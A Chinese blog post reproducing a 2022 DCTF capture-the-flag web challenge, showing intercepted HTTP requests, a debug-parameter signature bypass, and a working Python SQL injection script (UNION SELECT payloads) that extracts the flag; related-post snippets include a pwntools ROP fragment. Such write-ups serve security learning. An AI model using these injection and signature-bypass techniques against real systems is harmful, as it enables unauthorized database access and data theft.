DCTF复现

于 2022-04-19 10:04:38 发布
阅读量2.4k 收藏
点赞数 1
分类专栏: 比赛复现 文章标签: 复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124242501
版权

目录

SQL Tutor

参考

https://hussienmisbah.github.io/post/sql-tutor/

分析

过滤很多关键词。
在这里插入图片描述
先抓包试一下。

POST /verify_and_sign_text HTTP/2
Host: sqltutor.dragonsec.si
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 22
Origin: https://sqltutor.dragonsec.si
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

text=dGVzdG1l&alg=sha1

可以看到存在签名,以及我们的base64后的查询内容。
在这里插入图片描述
当我们传'的时候,有明显不一样的回显,说明有戏。
在这里插入图片描述
把上面的测试包在发一下,可以看到另一个包,但是只有当上面的status为ok时才会转发,也就是说传'时,它是不会转发的。

POST /execute HTTP/2
Host: sqltutor.dragonsec.si
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: https://sqltutor.dragonsec.si
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

text=dGVzdG1l&signature=f26039ef86a8c1218019b40e636d66ecfb45324a&queryNo=0

可以看到这里有一个响应后又个debug参数,可以试着把他加到请求上,看能不能在响应后看到debug的具体内容。
在这里插入图片描述
加上debug=true后,我们可以看到它的debug了。
在这里插入图片描述
那如果在这边把我们测试文本改为黑名单过滤的字符串,就可以看到黑名单过滤的字符串的签名了。
在这里插入图片描述
且他已经把数据库查询语句告诉我们了,我们可以很容易构造sql注入。
在这里插入图片描述

理一理攻击思路:

 1. 先发出一个有效的请求。
 2. 接着发出我们的sql语句,来获取这句sql的签名。
 3. 最把sql语句和签名在转发页重新发送。

攻击脚本

import requests
import base64
import re


url= "https://sqltutor.dragonsec.si/execute"
#payload = "a' UNION SELECT 1,2,3,group_concat(table_name) FROM information_schema.tables#".encode('utf-8')
#payload ="a' UNION SELECT 1,2,3,group_concat(column_name) FROM information_schema.columns where table_name='flags'#".encode('utf-8')
payload ="a' UNION SELECT 1,2,3,flag FROM flags#".encode('utf-8')
encode_payload = base64.b64encode(payload)

data = {
    'text': encode_payload,
    'signature':'dummy',
    'queryNo':'0',
    'debug':'true'
}
try:
    req = requests.post(url,data=data)
    signature = req.text.split('"compare":"')[1][0:40]#以【"compare":"】为分割,并获取第二部分的0~40的字符串
    data['signature'] = signature
    final = requests.post(url,data=data)
    flag = re.search('"age":"(.*?)"', final.text).group(0)[:50]
    print(flag)
except:
    print('[error]')

BookStore.java

参考

https://ctftime.org/writeup/33295
反编译器(如JD-GUI )

如果只是普通解压缩,文件是不全的,可以用反编译器来处理
在这里插入图片描述
反编译器
在这里插入图片描述

succ3
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
飞桨论文复现课笔记(论文复现步骤)
Ema1997的博客
08-28 4268
目录一、读论文二、论文代码解读1. ReadMe2. 代码结构3. 核心代码三、论文复现四、评估模型五、小结 一篇论文的复现步骤如下 一、读论文 一篇论文的abstract、applications、method、quantitative evaluation部分比较重要,着重看。在这一阶段对网络的架构等做一定的了解。 二、论文代码解读 1. ReadMe 了解网络实现功能,前期环境准备,如何开始训练网络,网络所需参数等。 2. 代码结构 程序入口文件:train.py、main_train.py等类似文
CRYPTO [61dctf]cry Writeup(RSA已知p的高位攻击)
01-20
[61dctf]cry 题目来源:https://www.jarvisoj.com/challenges Coppersmith攻击:已知p的高位攻击 关键点:用SageMath 恢复RSA完整的p 题目给了源码,其中print如下信息: print ====welcome to cry system==== (p,q...
DCT变换编码及C语言实现
海阔天空
07-13 8297
离散余弦变换(Discrete Cosine Transform,简称DCT变换)是一种与傅立叶变换紧密相关的数学运算。在傅立叶级数展开式中,如果被展开的函数是实偶函数,那么其傅立叶级数中只包含余弦项,再将其离散化可导出余弦变换,因此称之为离散余弦变换。       离散余弦变换(DCT)是N.Ahmed等人在1974年提出的正交变换方法。它...
2021 DCTF - Misc
LYJ20010728的博客
09-15 465
2021 DCTF - MiscEncrypted Flag I Have题目描述解题思路 Encrypted Flag I Have 题目描述 Decrypted flag is not in exact format. 解题思路 图片是 Aurebesh 语言,利用 dcode.fr 进行解密 得到 Flag:DCTFMASTERCODEBREBREAKER } ...
DCT人脸识别毕业论文
08-15
人脸识别技术主要通过三个步骤完成,即人脸的检测与定位、人脸的特征提取和人脸的识别与验证。即在采集到的图像中寻找人脸,如果有则确定人脸的位置并将其提取出来(当输入是图像序列是,人脸定位过程也成为人脸跟踪),然后提取人脸的特征进行识别验证。
DCTF-wp部分
yutianovo的博客
05-17 566
pwn Pwn sanity check from pwn import * context.log_level = 'debug' # io = process("./pwn_sanity_check") io = remote("dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io", 7480) pop_rdi = 0x0000000000400813 system_plt = 0x4006e2 bin_sh = 0x40089E payl
5月份36dctf
doudoudedi
05-04 392
exec_comm.constprop+1162kaishell PWN_MengxinStack 栈不会了orz 就是基本的栈溢出操控libc_start_main这个函数来控制程序流程需要将返回地址爆破到libc_start_main+176然后就是基本的ROP了 exp: #!/usr/bin/python2 from pwn import * p=0 def pwn(ip,port,deb...
A&DCTF
weixin_30730053的博客
11-13 177
ADCTF WRITEUP 方向:Reverse 解题数:2 题目:Reverse_01 解题过程: 用ida打开反汇编查看代码,看main函数发现 关键部分,字符串比较,竟然是直接比较”is_this_po?”相等,然后连续输入这字符串(因为之前的逻辑)最后得到flag 题目:baby_crack 解题过程: 看到题目下载exe文件,用...
61dctf writeup
quedgee
10-29 2752
admin打开页面发现。。。。就一个Hello World= =,查看源代码也无果,那么抓个包吧= = emmmm,发现什么也没有,那么就robots.txt看看吧,发现果然有东西 web.jarvisoj.com:32792/robots.txt 访问这个后发现。。。。flag{hello guest}。。。。嗯。。。被骗了,提交这个没有用 那么在这个页面抓个包,再改一次admin
星座图的matlab代码-PastCode:一些过去的代码,用于读取文件和可视化
05-27
星座图的matlab代码过去代码 一些过去的代码,用于读取文件和可视化。 基于MATLAB GUI。 程序读取文件并显示I / Q波形和星座图。
1762java校园单车投放系统Myeclipse开发mysql数据库web结构jsp编程servlet计算机网页项目源码
04-24
一、源码特点 java校园单车投放管理系统是一套完善的java web... 3、数据库文件名是jspdctf.sql ,系统名称dctf 4、系统首页地址:http://127.0.0.1:8080/dctf/login.jsp 不包含人工调试服务,如果需要联系作者购买
计算机专业毕业设计范例845篇jsp2118基于Web停车场管理系统的设计与实现_Servlet_MySql演示录像.rar
05-24
博主给大家详细整理了计算机毕业设计最新项目,对项目有任何疑问(部署跟文档),都可以问博主哦~ 一、JavaWeb管理系统毕设项目【计算机毕设选题】计算机毕业设计选题,500个热门选题推荐,更多作品展示 计算机毕业设计|PHP毕业设计|JSP毕业程序设计|Android毕业设计|Python设计论文|微信小程序设计
Windows 10 平台 FFmpeg 开发环境搭建 博客资源
05-24
【FFmpeg】Windows 10 平台 FFmpeg 开发环境搭建 ④ ( FFmpeg 开发库内容说明 | 创建并配置 FFmpeg 项目 | 拷贝 DLL 动态库到 SysWOW64 目录 ) https://hanshuliang.blog.csdn.net/article/details/139172564 博客资源 一、FFmpeg 开发库 1、FFmpeg 开发库编译 2、FFmpeg 开发库内容说明 二、创建并配置 FFmpeg 项目 1、拷贝 dll 动态库到 C:\Windows\SysWOW64 目录 - 必须操作 特别关注 2、创建 Qt 项目 - C 语言程序 3、配置 FFmpeg 开发库 - C 语言项目 4、创建并配置 FFmpeg 开发库 - C++ 项目
基于 Spring Cloud 、Spring Boot、 OAuth2 的 RBAC 企业快速开发平台
05-24
基于 Spring Cloud 、Spring Boot、 OAuth2 的 RBAC 企业快速开发平台, 同时支持微服务架构和单体架构。提供对 Spring Authorization Server 生产级实践,支持多种安全授权模式。提供对常见容器化方案支持 Kubernetes、Rancher2 、Kubesphere、EDAS、SAE 支持
我赚100万的商业模式.pdf
05-24
我赚100万的商业模式
Python_编译器学习资源收集.zip
05-24
Python_编译器学习资源收集
VP01663276_VV20238868_20231114_133104_571.bin.dec.enc
最新发布
05-24
VP01663276_VV20238868_20231114_133104_571.bin.dec.enc
本人自己开发,用来提高工作效率的Arcgis工具箱,免费分享
05-24
地理信息Arcgis常用分析工具箱,包括补零更新编号、根据分组字段补零更新编号、递归文件夹下数据库要素转表、批量统计图层要素数量和字段汇总信息、批量擦除图层、文件夹或数据库递归属性表加图层信息、按属性分割要素、按属性分组合并等,,如有疑问或者需求可私信或QQ联系775915005
matlab dctf
10-09
DCTF是一种离散余弦变换,常用于信号和图像的压缩、降噪等方面。在Matlab中可以使用dct2函数进行二维离散余弦变换。 示例代码: ``` img = imread('lena.jpg'); img = im2double(img); % 转换为双精度型 dct_img = dct2(img); % 进行二维离散余弦变换 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值